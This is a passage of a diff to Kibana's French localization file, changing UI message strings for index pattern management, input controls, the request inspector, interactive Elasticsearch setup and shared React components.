"indexPatternManagement.editDataView.removeTooltip": "Supprimer", "indexPatternManagement.editDataView.setDefaultAria": "Définir en tant que vue de données par défaut.", - "indexPatternManagement.editDataView.setDefaultTooltip": "Définir en tant que vue de données par défaut.", - "indexPatternManagement.editHeader": "Modifier {fieldName}", + "indexPatternManagement.editDataView.setDefaultTooltip": "Définir par défaut", "indexPatternManagement.editIndexPattern.badge.securityDataViewTitle": "Vue de données Security", "indexPatternManagement.editIndexPattern.deleteButton": "Supprimer", - "indexPatternManagement.editIndexPattern.deprecation": "Les champs scriptés sont déclassés. Utilisez {runtimeDocs} à la place.", "indexPatternManagement.editIndexPattern.fields.addFieldButtonLabel": "Ajouter un champ", "indexPatternManagement.editIndexPattern.fields.conflictModal.closeBtn": "Fermer", - "indexPatternManagement.editIndexPattern.fields.conflictModal.description": "Le type de champ {fieldName} change entre les index et peut ne pas être disponible pour la recherche, les visualisations et d'autres analyses.", "indexPatternManagement.editIndexPattern.fields.conflictModal.title": "Ce champ possède un conflit de type", "indexPatternManagement.editIndexPattern.fields.filter": "Type du champ", "indexPatternManagement.editIndexPattern.fields.filterAria": "Filtrer les types de champ", @@ -4904,19 +4062,15 @@ "indexPatternManagement.editIndexPattern.fields.table.searchableDescription": "Ces champs peuvent être utilisés dans la barre de filtre.", "indexPatternManagement.editIndexPattern.fields.table.searchableHeader": "Interrogeable", "indexPatternManagement.editIndexPattern.fields.table.typeHeader": "Type", - "indexPatternManagement.editIndexPattern.list.DateHistogramDelaySummary": "retard : {delay},", - "indexPatternManagement.editIndexPattern.list.dateHistogramSummary": "{aggName} (intervalle : {interval}, {delay} {time_zone})", + "indexPatternManagement.editIndexPattern.indexPatternHeading": "Modèle d'indexation :", "indexPatternManagement.editIndexPattern.list.defaultIndexPatternListName": "Par défaut", - "indexPatternManagement.editIndexPattern.list.histogramSummary": "{aggName} (intervalle : {interval})", "indexPatternManagement.editIndexPattern.list.rollupIndexPatternListName": "Cumul", "indexPatternManagement.editIndexPattern.mappingConflictHeader": "Conflit de mapping", - "indexPatternManagement.editIndexPattern.mappingConflictLabel": "{conflictFieldsLength, plural, one {Un champ est défini} other {# champs sont définis}} avec plusieurs types (chaîne, entier, etc.) dans les différents index qui correspondent à ce modèle. Vous pourrez peut-être utiliser ce ou ces champs en conflit dans certaines parties de Kibana, mais ils ne seront pas disponibles pour les fonctions qui nécessitent que Kibana connaisse leur type. Pour corriger ce problème, vous devrez réindexer vos données.", "indexPatternManagement.editIndexPattern.scripted.addFieldButton": "Ajouter un champ scripté", "indexPatternManagement.editIndexPattern.scripted.deleteField.cancelButton": "Annuler", "indexPatternManagement.editIndexPattern.scripted.deleteField.deleteButton": "Supprimer", - "indexPatternManagement.editIndexPattern.scripted.deleteFieldLabel": "Supprimer le champ scripté \"{fieldName}\" ?", + "indexPatternManagement.editIndexPattern.scripted.deleteFieldLabel": "Supprimer le champ scripté \"{fieldName}\" ?", "indexPatternManagement.editIndexPattern.scripted.deprecationLangHeader": "Langages déclassés en cours d'utilisation", - "indexPatternManagement.editIndexPattern.scripted.deprecationLangLabel.deprecationLangDetail": "Les langages déclassés suivants sont en cours d'utilisation : {deprecatedLangsInUse}. La prise en charge de ces langages sera supprimée dans la prochaine version majeure de Kibana et d'Elasticsearch. Convertissez vos champs scriptés en {link} pour éviter tout problème.", "indexPatternManagement.editIndexPattern.scripted.deprecationLangLabel.painlessDescription": "Painless", "indexPatternManagement.editIndexPattern.scripted.newFieldPlaceholder": "Nouveau champ scripté", "indexPatternManagement.editIndexPattern.scripted.table.deleteDescription": "Supprimer ce champ", @@ -4935,7 +4089,7 @@ "indexPatternManagement.editIndexPattern.source.addButtonLabel": "Ajouter", "indexPatternManagement.editIndexPattern.source.deleteFilter.cancelButtonLabel": "Annuler", "indexPatternManagement.editIndexPattern.source.deleteFilter.deleteButtonLabel": "Supprimer", - "indexPatternManagement.editIndexPattern.source.deleteSourceFilterLabel": "Supprimer le filtre de champ \"{value}\" ?", + "indexPatternManagement.editIndexPattern.source.deleteSourceFilterLabel": "Supprimer le filtre de champ \"{value}\" ?", "indexPatternManagement.editIndexPattern.source.noteLabel": "Notez que les champs multiples apparaîtront incorrectement comme des correspondances dans le tableau ci-dessous. Ces filtres ne s'appliquent qu'aux champs dans le document source d'origine. Par conséquent, les champs multiples ne sont pas réellement filtrés.", "indexPatternManagement.editIndexPattern.source.table.cancelAria": "Annuler", "indexPatternManagement.editIndexPattern.source.table.deleteAria": "Supprimer", @@ -4949,9 +4103,9 @@ "indexPatternManagement.editIndexPattern.sourceLabel": "Les filtres de champ peuvent être utilisés pour exclure un ou plusieurs champs lors de la récupération d'un document. Cela se produit lors de l'affichage d'un document dans l'application Discover ou avec un tableau affichant les résultats d'une recherche enregistrée dans l'application Dashboard. Si vous avez des documents avec des champs de grande taille ou peu importants, il pourrait être utile de filtrer ces champs à ce niveau plus bas.", "indexPatternManagement.editIndexPattern.sourcePlaceholder": "filtre de champ, accepte les caractères génériques (par ex. \"utilisateur*\" pour filtrer les champs commençant par \"utilisateur\")", "indexPatternManagement.editIndexPattern.tabs.fieldsHeader": "Champs", - "indexPatternManagement.editIndexPattern.tabs.relationshipsHeader": "Relations ({count})", "indexPatternManagement.editIndexPattern.tabs.scriptedHeader": "Champs scriptés", "indexPatternManagement.editIndexPattern.tabs.sourceHeader": "Filtres de champ", + "indexPatternManagement.editIndexPattern.timeFilterHeading": "Champ temporel :", "indexPatternManagement.fieldTypeConflict": "Conflit de type de champ", "indexPatternManagement.formatHeader": "Format", "indexPatternManagement.formatLabel": "Le formatage détermine la façon dont les valeurs sont affichées. La modification de ce paramètre peut également affecter la valeur du champ et la mise en surbrillance dans Discover.", @@ -4962,10 +4116,9 @@ "indexPatternManagement.indexPatternTable.badge.securityDataViewTitle": "Vue de données Security", "indexPatternManagement.indexPatternTable.savedObjectName": "vue de données", "indexPatternManagement.labelHelpText": "Définissez une étiquette personnalisée à utiliser lorsque ce champ est affiché dans Discover, Maps et Visualize. Actuellement, les requêtes et les filtres ne prennent pas en charge les étiquettes personnalisées et utilisent le nom d'origine des champs.", - "indexPatternManagement.languageLabel": "Langage", - "indexPatternManagement.mappingConflictLabel.mappingConflictDetail": "{mappingConflict} Vous avez déjà un champ nommé {fieldName}. Si vous donnez le même nom à votre champ scripté, vous ne pourrez pas interroger les deux champs en même temps.", - "indexPatternManagement.mappingConflictLabel.mappingConflictLabel": "Conflit de mapping :", - "indexPatternManagement.multiTypeLabelDesc": "Le type de ce champ varie selon les index. Il n'est pas disponible pour de nombreuses fonctions d'analyse. Les index par type sont les suivants :", + "indexPatternManagement.languageLabel": "Langue", + "indexPatternManagement.mappingConflictLabel.mappingConflictLabel": "Conflit de mapping :", + "indexPatternManagement.multiTypeLabelDesc": "Le type de ce champ varie selon les index. Il n'est pas disponible pour de nombreuses fonctions d'analyse. Les index par type sont les suivants :", "indexPatternManagement.nameErrorMessage": "Nom obligatoire", "indexPatternManagement.nameLabel": "Nom", "indexPatternManagement.namePlaceholder": "Nouveau champ scripté", @@ -4975,9 +4128,7 @@ "indexPatternManagement.objectsTable.relationships.columnTypeName": "Type", "indexPatternManagement.objectsTable.relationships.search.filters.type.name": "Type", "indexPatternManagement.popularityLabel": "Popularité", - "indexPatternManagement.script.accessWithLabel": "Accédez aux champs avec {code}.", "indexPatternManagement.script.getHelpLabel": "Obtenez de l'aide pour la syntaxe et prévisualisez les résultats de votre script.", - "indexPatternManagement.scriptedFieldsDeprecatedBody": "Pour profiter de plus de flexibilité et de la prise en charge des scripts Painless, utilisez {runtimeDocs}.", "indexPatternManagement.scriptedFieldsDeprecatedTitle": "Les champs scriptés sont déclassés.", "indexPatternManagement.scriptingLanguages.errorFetchingToastDescription": "Erreur lors de l'obtention des langages de script disponibles à partir d'Elasticsearch", "indexPatternManagement.scriptInvalidErrorMessage": "Script non valide. Voir l'aperçu du script pour plus de détails.", @@ -4986,46 +4137,35 @@ "indexPatternManagement.scriptRequiredErrorMessage": "Script obligatoire", "indexPatternManagement.starCharacterNotAllowedValidationErrorMessage": "Le nom du champ ne peut pas contenir *.", "indexPatternManagement.syntax.default.formatLabel": "doc['some_field'].value", - "indexPatternManagement.syntax.defaultLabel.defaultDetail": "Par défaut, les champs scriptés Kibana emploient {painless}, un langage de script simple et sécurisé spécialement conçu pour Elasticsearch. Pour accéder aux valeurs du document, utilisez le format suivant :", "indexPatternManagement.syntax.defaultLabel.painlessLink": "Painless", "indexPatternManagement.syntax.kibanaLabel": "Kibana impose actuellement une limitation spéciale sur les scripts Painless. Ils ne peuvent pas contenir de fonctions nommées.", - "indexPatternManagement.syntax.lucene.commonLabel.commonDetail": "Vous venez d'une ancienne version de Kibana ? Les expressions {lucene} que vous connaissez et adorez sont toujours disponibles. Les expressions Lucene ressemblent beaucoup à du JavaScript, mais elles se limitent aux opérations arithmétiques de base, aux opérations au niveau du bit et aux opérations de comparaison.", "indexPatternManagement.syntax.lucene.commonLabel.luceneLink": "Expressions Lucene", "indexPatternManagement.syntax.lucene.limits.fieldsLabel": "Les champs stockés ne sont pas disponibles.", - "indexPatternManagement.syntax.lucene.limits.sparseLabel": "Si un champ est clairsemé (seuls certains documents contiennent une valeur), les documents où ce champ est vide auront une valeur de 0.", + "indexPatternManagement.syntax.lucene.limits.sparseLabel": "Si un champ est clairsemé (seuls certains documents contiennent une valeur), les documents où ce champ est vide auront une valeur de 0.", "indexPatternManagement.syntax.lucene.limits.typesLabel": "Seuls les champs numériques, booléens, de date et de point géographique sont accessibles.", - "indexPatternManagement.syntax.lucene.limitsLabel": "L'utilisation d’expressions Lucene implique quelques limitations :", - "indexPatternManagement.syntax.lucene.operations.arithmeticLabel": "Opérateurs arithmétiques : {operators}", - "indexPatternManagement.syntax.lucene.operations.bitwiseLabel": "Opérateurs au niveau du bit : {operators}", - "indexPatternManagement.syntax.lucene.operations.booleanLabel": "Opérateurs booléens (y compris l'opérateur ternaire) : {operators}", - "indexPatternManagement.syntax.lucene.operations.comparisonLabel": "Opérateurs de comparaison : {operators}", - "indexPatternManagement.syntax.lucene.operations.distanceLabel": "Fonctions de distance : {operators}", - "indexPatternManagement.syntax.lucene.operations.mathLabel": "Fonctions mathématiques communes : {operators}", - "indexPatternManagement.syntax.lucene.operations.miscellaneousLabel": "Fonctions diverses : {operators}", - "indexPatternManagement.syntax.lucene.operations.trigLabel": "Fonctions de bibliothèque trigonométrique : {operators}", - "indexPatternManagement.syntax.lucene.operationsLabel": "Voici toutes les opérations disponibles pour les expressions Lucene :", - "indexPatternManagement.syntax.painlessLabel.javaAPIsLink": "API Java natives", - "indexPatternManagement.syntax.painlessLabel.painlessDetail": "Painless est un langage puissant, mais facile à utiliser. Il donne accès à de nombreuses {javaAPIs}. Lisez-en plus sur sa {syntax} et découvrez tout ce que vous devez savoir en un rien de temps !", + "indexPatternManagement.syntax.lucene.limitsLabel": "L'utilisation d’expressions Lucene implique quelques limitations :", + "indexPatternManagement.syntax.lucene.operationsLabel": "Voici toutes les opérations disponibles pour les expressions Lucene :", + "indexPatternManagement.syntax.painlessLabel.javaAPIsLink": "API Java natives", "indexPatternManagement.syntax.painlessLabel.syntaxLink": "syntaxe", "indexPatternManagement.syntaxHeader": "Syntaxe", "indexPatternManagement.testScript.errorMessage": "Votre script présente une erreur.", "indexPatternManagement.testScript.fieldsLabel": "Champs supplémentaires", "indexPatternManagement.testScript.fieldsPlaceholder": "Sélectionner…", - "indexPatternManagement.testScript.instructions": "Exécutez votre script pour prévisualiser les 10 premiers résultats. Vous pouvez également sélectionner des champs supplémentaires à inclure dans les résultats pour obtenir plus de contexte ou ajouter une requête pour filtrer des documents spécifiques.", - "indexPatternManagement.testScript.resultsLabel": "10 premiers résultats", + "indexPatternManagement.testScript.instructions": "Exécutez votre script pour prévisualiser les 10 premiers résultats. Vous pouvez également sélectionner des champs supplémentaires à inclure dans les résultats pour obtenir plus de contexte ou ajouter une requête pour filtrer des documents spécifiques.", + "indexPatternManagement.testScript.resultsLabel": "10 premiers résultats", "indexPatternManagement.testScript.resultsTitle": "Prévisualiser les résultats", "indexPatternManagement.testScript.submitButtonLabel": "Exécuter le script", "indexPatternManagement.typeLabel": "Type", - "indexPatternManagement.warningCallOutLabel.callOutDetail": "Familiarisez-vous avec les {scripFields} et les {scriptsInAggregation} avant d'utiliser cette fonctionnalité. Les champs scriptés peuvent être utilisés pour afficher et agréger les valeurs calculées. Dès lors, ils peuvent être très lents et, s'ils ne sont pas faits correctement, ils peuvent rendre Kibana inutilisable.", "indexPatternManagement.warningCallOutLabel.runtimeLink": "champs d'exécution", "indexPatternManagement.warningCallOutLabel.scripFieldsLink": "champs scriptés", "indexPatternManagement.warningCallOutLabel.scriptsInAggregationLink": "scripts en agrégations", - "indexPatternManagement.warningHeader": "Avertissement de déclassement :", + "indexPatternManagement.warningHeader": "Avertissement de déclassement :", "indexPatternManagement.warningLabel.painlessLinkLabel": "Painless", - "indexPatternManagement.warningLabel.warningDetail": "{language} est déclassé et ne sera plus pris en charge dans la prochaine version majeure de Kibana et d'Elasticsearch. Nous recommandons d'utiliser {painlessLink} pour les nouveaux champs scriptés.", - "inputControl.control.noIndexPatternTooltip": "Impossible de localiser l'ID du modèle d'indexation : {indexPatternId}.", - "inputControl.control.notInitializedTooltip": "Le contrôle n'a pas été initialisé.", + "inputControl.control.noIndexPatternTooltip": "Impossible de localiser l'ID du modèle d'indexation : {indexPatternId}.", "inputControl.control.noValuesDisableTooltip": "Le filtrage se produit sur le champ \"{fieldName}\", qui n'existe dans aucun document du modèle d'indexation \"{indexPatternName}\". Sélectionnez un champ différent ou des documents d'index qui contiennent des valeurs pour ce champ.", + "inputControl.listControl.unableToFetchTooltip": "Impossible de récupérer les termes. Erreur : {errorMessage}.", + "inputControl.rangeControl.unableToFetchTooltip": "Impossible de récupérer les valeurs min. et max. de la plage. Erreur : {errorMessage}.", + "inputControl.control.notInitializedTooltip": "Le contrôle n'a pas été initialisé.", "inputControl.editor.controlEditor.controlLabel": "Contrôler l'étiquette", "inputControl.editor.controlEditor.moveControlDownAriaLabel": "Abaisser le contrôle", "inputControl.editor.controlEditor.moveControlUpAriaLabel": "Remonter le contrôle", @@ -5055,8 +4195,6 @@ "inputControl.editor.rangeControl.stepSizeLabel": "Taille de l'étape", "inputControl.function.help": "Visualisation du contrôle d'entrée", "inputControl.listControl.disableTooltip": "Désactivé jusqu'à ce que \"{label}\" soit défini.", - "inputControl.listControl.unableToFetchTooltip": "Impossible de récupérer les termes. Erreur : {errorMessage}.", - "inputControl.rangeControl.unableToFetchTooltip": "Impossible de récupérer les valeurs min. et max. de la plage. Erreur : {errorMessage}.", "inputControl.register.controlsDescription": "Les contrôles d'entrée sont déclassés et seront supprimés dans une prochaine version.", "inputControl.register.controlsTitle": "Contrôles d'entrée", "inputControl.register.tabs.controlsTitle": "Contrôles", @@ -5067,6 +4205,11 @@ "inputControl.vis.listControl.partialResultsWarningMessage": "La liste des termes peut être incomplète, car la requête prend trop de temps. Ajustez les paramètres de saisie semi-automatique dans le fichier kibana.yml pour obtenir des résultats complets.", "inputControl.vis.listControl.selectPlaceholder": "Sélectionner…", "inputControl.vis.listControl.selectTextPlaceholder": "Sélectionner…", + "inspector.requests.requestTimeLabel": "{requestTime} ms", + "inspector.requests.requestWasMadeDescription": "{requestsCount, plural, one {# requête a été effectuée} other {# requêtes ont été effectuées} }{failedRequests}", + "inspector.requests.requestWasMadeDescription.requestHadFailureText": ", {failedCount} a/ont échoué.", + "inspector.requests.searchSessionId": "ID de la session de recherche : {searchSessionId}", + "inspector.view": "Vue : {viewName}", "inspector.closeButton": "Fermer l'inspecteur", "inspector.reqTimestampDescription": "Heure de début de la requête", "inspector.reqTimestampKey": "Horodatage de la requête", @@ -5077,38 +4220,42 @@ "inspector.requests.noRequestsLoggedDescription.whatDoesItUsuallyMeanText": "Cela signifie généralement qu'il n'était pas nécessaire de récupérer des données ou que l'élément n'a pas encore commencé à récupérer des données.", "inspector.requests.noRequestsLoggedTitle": "Aucune requête consignée", "inspector.requests.openInConsoleLabel": "Ouvrir dans la console", - "inspector.requests.openInSearchProfilerLabel": "Ouvrir dans Search Profiler", + "inspector.requests.openInSearchProfilerLabel": "Ouvrir dans Search Profiler", "inspector.requests.requestFailedTooltipTitle": "Échec de la requête", "inspector.requests.requestInProgressAriaLabel": "Requête en cours", "inspector.requests.requestsDescriptionTooltip": "Afficher les requêtes de recherche utilisées pour collecter les données", "inspector.requests.requestsTitle": "Requêtes", "inspector.requests.requestSucceededTooltipTitle": "Requête réussie", "inspector.requests.requestTabLabel": "Requête", - "inspector.requests.requestTimeLabel": "{requestTime} ms", "inspector.requests.requestTooltipDescription": "Durée totale qu'a nécessité la requête.", - "inspector.requests.requestWasMadeDescription": "{requestsCount, plural, one {# requête a été effectuée} other {# requêtes ont été effectuées} }{failedRequests}", - "inspector.requests.requestWasMadeDescription.requestHadFailureText": ", {failedCount} a/ont échoué.", "inspector.requests.responseTabLabel": "Réponse", - "inspector.requests.searchSessionId": "ID de la session de recherche : {searchSessionId}", "inspector.requests.statisticsTabLabel": "Statistiques", "inspector.title": "Inspecteur", - "inspector.view": "Vue : {viewName}", + "interactiveSetup.certificatePanel.fingerprint": "Empreinte digitale (SHA-256) : {fingerprint}", + "interactiveSetup.certificatePanel.issuer": "Émis par : {issuer}", + "interactiveSetup.certificatePanel.validFrom": "Émis le : {validFrom}", + "interactiveSetup.certificatePanel.validTo": "Expire le : {validTo}", + "interactiveSetup.clusterAddressForm.submitButton": "{isSubmitting, select, true{Vérification de l'adresse…} other{Vérifier l'adresse}}", + "interactiveSetup.clusterConfigurationForm.submitButton": "{isSubmitting, select, true{Configuration d'Elastic…} other{Configurer Elastic}}", + "interactiveSetup.enrollmentTokenForm.submitButton": "{isSubmitting, select, true{Configuration d'Elastic…} other{Configurer Elastic}}", + "interactiveSetup.forgotPasswordPopover.helpText": "Pour réinitialiser le mot de passe de l'utilisateur {username}, exécutez la commande suivante à partir du répertoire d'installation Elasticsearch :", + "interactiveSetup.singleCharsField.digitLabel": "Chiffre {index}", + "interactiveSetup.submitErrorCallout.compatibilityFailureErrorDescription": "Le cluster Elasticsearch (v{elasticsearchVersion}) est incompatible avec cette version de Kibana (v{kibanaVersion}).", + "interactiveSetup.submitErrorCallout.kibanaConfigFailureErrorDescription": "Réessayez ou mettez à jour le fichier {config} manuellement.", + "interactiveSetup.submitErrorCallout.kibanaConfigNotWritableErrorDescription": "Vérifiez les autorisations du fichier et assurez-vous que {config} peut être écrit par le processus Kibana.", + "interactiveSetup.verificationCodeForm.codeDescription": "Copiez le code à partir du serveur Kibana ou exécutez {command} pour le récupérer.", + "interactiveSetup.verificationCodeForm.submitButton": "{isSubmitting, select, true{Vérification…} other{Vérifier}}", "interactiveSetup.app.notReady": "Le serveur Kibana n’est pas encore prêt.", "interactiveSetup.app.pageTitle": "Configurez Elastic pour commencer", "interactiveSetup.certificateChain.cancelButton": "Fermer", "interactiveSetup.certificateChain.title": "Chaîne de certificat", - "interactiveSetup.certificatePanel.fingerprint": "Empreinte digitale (SHA-256) : {fingerprint}", "interactiveSetup.certificatePanel.intermediateCertificateAuthority": "CA intermédiaire", - "interactiveSetup.certificatePanel.issuer": "Émis par : {issuer}", "interactiveSetup.certificatePanel.rootCertificateAuthority": "CA racine", "interactiveSetup.certificatePanel.serverCertificate": "Certificat de serveur", - "interactiveSetup.certificatePanel.validFrom": "Émis le : {validFrom}", - "interactiveSetup.certificatePanel.validTo": "Expire le : {validTo}", "interactiveSetup.clusterAddressForm.cancelButton": "Retour", "interactiveSetup.clusterAddressForm.hostInvalidError": "Saisissez une adresse valide, avec \"http\" ou \"https\".", "interactiveSetup.clusterAddressForm.hostLabel": "Adresse", "interactiveSetup.clusterAddressForm.hostRequiredError": "Entrez une adresse.", - "interactiveSetup.clusterAddressForm.submitButton": "{isSubmitting, select, true{Vérification de l'adresse…} other{Vérifier l'adresse}}", "interactiveSetup.clusterAddressForm.submitErrorTitle": "Vérification de l'adresse impossible", "interactiveSetup.clusterConfigurationForm.caCertConfirmationRequiredError": "Confirmez que vous reconnaissez ce certificat et que vous lui faites confiance.", "interactiveSetup.clusterConfigurationForm.caCertLabel": "Autorité de certificat", @@ -5119,45 +4266,36 @@ "interactiveSetup.clusterConfigurationForm.insecureClusterTitle": "Ce cluster n’est pas sécurisé", "interactiveSetup.clusterConfigurationForm.passwordLabel": "Mot de passe", "interactiveSetup.clusterConfigurationForm.passwordRequiredError": "Entrez un mot de passe.", - "interactiveSetup.clusterConfigurationForm.submitButton": "{isSubmitting, select, true{Configuration d'Elastic…} other{Configurer Elastic}}", "interactiveSetup.clusterConfigurationForm.submitErrorTitle": "Configuration d'Elastic impossible", - "interactiveSetup.clusterConfigurationForm.trustCaCertLabel": "Je reconnais ce certificat et je lui fais confiance :", + "interactiveSetup.clusterConfigurationForm.trustCaCertLabel": "Je reconnais ce certificat et je lui fais confiance :", "interactiveSetup.clusterConfigurationForm.usernameLabel": "Nom d'utilisateur", "interactiveSetup.clusterConfigurationForm.usernameRequiredError": "Entrez un nom d'utilisateur.", "interactiveSetup.clusterConfigurationForm.usernameReservedError": "l'utilisateur \"elastic\" ne peut pas être utilisé en tant qu’utilisateur système Kibana.", "interactiveSetup.enrollmentTokenDetails.connectTo": "Se connecter à", "interactiveSetup.enrollmentTokenForm.cancelButton": "Configurer manuellement", - "interactiveSetup.enrollmentTokenForm.submitButton": "{isSubmitting, select, true{Configuration d'Elastic…} other{Configurer Elastic}}", "interactiveSetup.enrollmentTokenForm.submitErrorTitle": "Configuration d'Elastic impossible", "interactiveSetup.enrollmentTokenForm.tokenInvalidError": "Entrez un jeton d'enregistrement valide.", "interactiveSetup.enrollmentTokenForm.tokenLabel": "Jeton d'enregistrement", "interactiveSetup.enrollmentTokenForm.tokenPlaceholder": "Collez le jeton d'enregistrement à partir du terminal.", "interactiveSetup.enrollmentTokenForm.tokenRequiredError": "Entrez un jeton d'enregistrement.", - "interactiveSetup.enrollmentTokenHelpPopover.buttonText": "Où puis-je le trouver ?", - "interactiveSetup.enrollmentTokenHelpPopover.commandHelpText": "Pour générer un nouveau jeton d'enregistrement, exécutez la commande suivante à partir du répertoire d'installation Elasticsearch :", + "interactiveSetup.enrollmentTokenHelpPopover.buttonText": "Où puis-je le trouver ?", + "interactiveSetup.enrollmentTokenHelpPopover.commandHelpText": "Pour générer un nouveau jeton d'enregistrement, exécutez la commande suivante à partir du répertoire d'installation Elasticsearch :", "interactiveSetup.enrollmentTokenHelpPopover.docLinkText": "Découvrez comment configurer Elastic.", "interactiveSetup.enrollmentTokenHelpPopover.helpText": "Le jeton d'enregistrement est automatiquement généré lorsque vous démarrez Elasticsearch pour la première fois. Vous devrez peut-être faire défiler la vue du terminal en arrière pour l'afficher.", - "interactiveSetup.forgotPasswordPopover.buttonText": "Mot de passe oublié ?", - "interactiveSetup.forgotPasswordPopover.helpText": "Pour réinitialiser le mot de passe de l'utilisateur {username}, exécutez la commande suivante à partir du répertoire d'installation Elasticsearch :", + "interactiveSetup.forgotPasswordPopover.buttonText": "Mot de passe oublié ?", "interactiveSetup.progressIndicator.completeStepTitle": "Achèvement de la configuration", "interactiveSetup.progressIndicator.prebootStepTitle": "Enregistrement des paramètres", "interactiveSetup.progressIndicator.unavailableStepTitle": "Démarrage d'Elastic", - "interactiveSetup.singleCharsField.digitLabel": "Chiffre {index}", - "interactiveSetup.submitErrorCallout.compatibilityFailureErrorDescription": "Le cluster Elasticsearch (v{elasticsearchVersion}) est incompatible avec cette version de Kibana (v{kibanaVersion}).", "interactiveSetup.submitErrorCallout.elasticsearchConnectionConfiguredErrorTitle": "Elastic est déjà configuré", "interactiveSetup.submitErrorCallout.elasticsearchConnectionConfiguredSubmitButton": "Continuer vers Kibana", "interactiveSetup.submitErrorCallout.EnrollFailureErrorDescription": "Générez un nouveau jeton d'enregistrement ou configurez-le manuellement.", "interactiveSetup.submitErrorCallout.forbiddenErrorDescription": "Réessayez de configurer Elastic.", "interactiveSetup.submitErrorCallout.forbiddenErrorTitle": "Vérification requise", - "interactiveSetup.submitErrorCallout.kibanaConfigFailureErrorDescription": "Réessayez ou mettez à jour le fichier {config} manuellement.", - "interactiveSetup.submitErrorCallout.kibanaConfigNotWritableErrorDescription": "Vérifiez les autorisations du fichier et assurez-vous que {config} peut être écrit par le processus Kibana.", "interactiveSetup.submitErrorCallout.kibanaConfigNotWritableErrorTitle": "Écriture impossible dans le fichier de configuration", "interactiveSetup.submitErrorCallout.pingFailureErrorDescription": "Vérifiez l'adresse et réessayez.", "interactiveSetup.submitErrorCallout.pingFailureErrorTitle": "Connexion au cluster impossible", - "interactiveSetup.verificationCodeForm.codeDescription": "Copiez le code à partir du serveur Kibana ou exécutez {command} pour le récupérer.", "interactiveSetup.verificationCodeForm.codeMinLengthError": "Entrez les six chiffres.", "interactiveSetup.verificationCodeForm.codeRequiredError": "Entrez le code de vérification à partir du serveur Kibana.", - "interactiveSetup.verificationCodeForm.submitButton": "{isSubmitting, select, true{Vérification…} other{Vérifier}}", "interactiveSetup.verificationCodeForm.submitErrorTitle": "Vérification du code impossible", "interactiveSetup.verificationCodeForm.title": "Vérification requise", "kbnConfig.deprecations.conflictSetting.manualStepOneMessage": "Assurez-vous que \"{fullNewPath}\" contient la valeur correcte dans le fichier de configuration, l'indicateur CLI ou la variable d'environnement (dans Docker uniquement).", @@ -5170,15 +4308,32 @@ "kbnConfig.deprecations.replacedSettingMessage": "Le paramètre \"{fullOldPath}\" a été remplacé par \"{fullNewPath}\".", "kbnConfig.deprecations.unusedSetting.manualStepOneMessage": "Retirez \"{fullPath}\" dans le fichier de configuration Kibana, l'indicateur CLI ou la variable d'environnement (dans Docker uniquement).", "kbnConfig.deprecations.unusedSettingMessage": "Vous n’avez plus besoin de configurer \"{fullPath}\".", + "kibana_utils.stateManagement.stateHash.unableToStoreHistoryInSessionErrorMessage": "Kibana n'est pas en mesure de stocker des éléments d'historique dans votre session, car le stockage est arrivé à saturation et il ne semble pas y avoir d'éléments pouvant être supprimés sans risque.\n\nCe problème peut généralement être corrigé en passant à un nouvel onglet, mais il peut être causé par un problème plus important. Si ce message s'affiche régulièrement, veuillez nous en faire part sur {gitHubIssuesUrl}.", "kibana_utils.history.savedObjectIsMissingNotificationMessage": "L'objet enregistré est manquant.", "kibana_utils.stateManagement.stateHash.unableToRestoreUrlErrorMessage": "Impossible de restaurer complètement l'URL. Assurez-vous d'utiliser la fonctionnalité de partage.", - "kibana_utils.stateManagement.stateHash.unableToStoreHistoryInSessionErrorMessage": "Kibana n'est pas en mesure de stocker des éléments d'historique dans votre session, car le stockage est arrivé à saturation et il ne semble pas y avoir d'éléments pouvant être supprimés sans risque.\n\nCe problème peut généralement être corrigé en passant à un nouvel onglet, mais il peut être causé par un problème plus important. Si ce message s'affiche régulièrement, veuillez nous en faire part sur {gitHubIssuesUrl}.", "kibana_utils.stateManagement.url.restoreUrlErrorTitle": "Erreur lors de la restauration de l'état depuis l'URL.", "kibana_utils.stateManagement.url.saveStateInUrlErrorTitle": "Erreur lors de l'enregistrement de l'état dans l'URL.", + "kibana-react.dualRangeControl.outsideOfRangeErrorMessage": "Les valeurs doivent être comprises entre {min} et {max}, inclus.", + "kibana-react.kibanaCodeEditor.startEditing": "Appuyez sur {key} pour modifier.", + "kibana-react.kibanaCodeEditor.startEditingReadOnly": "Appuyez sur {key} pour interagir avec le code.", + "kibana-react.kibanaCodeEditor.stopEditing": "Appuyez sur {key} pour arrêter la modification.", + "kibana-react.kibanaCodeEditor.stopEditingReadOnly": "Appuyez sur {key} pour arrêter l'interaction.", + "kibana-react.noDataPage.cantDecide": "Vous ne savez pas quoi utiliser ? {link}", + "kibana-react.noDataPage.intro": "Ajoutez vos données pour commencer, ou {link} sur {solution}.", + "kibana-react.noDataPage.welcomeTitle": "Bienvenue dans Elastic {solution}.", + "kibana-react.solutionNav.mobileTitleText": "Menu {solutionName}", + "kibana-react.tableListView.listing.createNewItemButtonLabel": "Créer {entityName}", + "kibana-react.tableListView.listing.deleteButtonMessage": "Supprimer {itemCount} {entityName}", + "kibana-react.tableListView.listing.deleteConfirmModalDescription": "Vous ne pourrez pas récupérer les {entityNamePlural} supprimés.", + "kibana-react.tableListView.listing.deleteSelectedConfirmModal.title": "Supprimer {itemCount} {entityName} ?", + "kibana-react.tableListView.listing.fetchErrorDescription": "Le listing {entityName} n'a pas pu être récupéré : {message}.", + "kibana-react.tableListView.listing.listingLimitExceededDescription": "Vous avez {totalItems} {entityNamePlural}, mais votre paramètre {listingLimitText} empêche le tableau ci-dessous d'en afficher plus de {listingLimitValue}. Vous pouvez modifier ce paramètre sous {advancedSettingsLink}.", + "kibana-react.tableListView.listing.listingLimitExceededDescriptionNoPermissions": "Vous avez {totalItems} {entityNamePlural}, mais votre paramètre {listingLimitText} empêche le tableau ci-dessous d'en afficher plus de {listingLimitValue}. Contactez l'administrateur système pour modifier ce paramètre.", + "kibana-react.tableListView.listing.table.editActionName": "Modifier {itemDescription}", + "kibana-react.tableListView.listing.unableToDeleteDangerMessage": "Impossible de supprimer la/le/les {entityName}(s)", "kibana-react.dualRangeControl.maxInputAriaLabel": "Maximum de la plage", "kibana-react.dualRangeControl.minInputAriaLabel": "Minimum de la plage", "kibana-react.dualRangeControl.mustSetBothErrorMessage": "Les valeurs inférieure et supérieure doivent être définies.", - "kibana-react.dualRangeControl.outsideOfRangeErrorMessage": "Les valeurs doivent être comprises entre {min} et {max}, inclus.", "kibana-react.dualRangeControl.upperValidErrorMessage": "La valeur supérieure doit être supérieure ou égale à la valeur inférieure.", "kibana-react.exitFullScreenButton.exitFullScreenModeButtonAriaLabel": "Quitter le mode 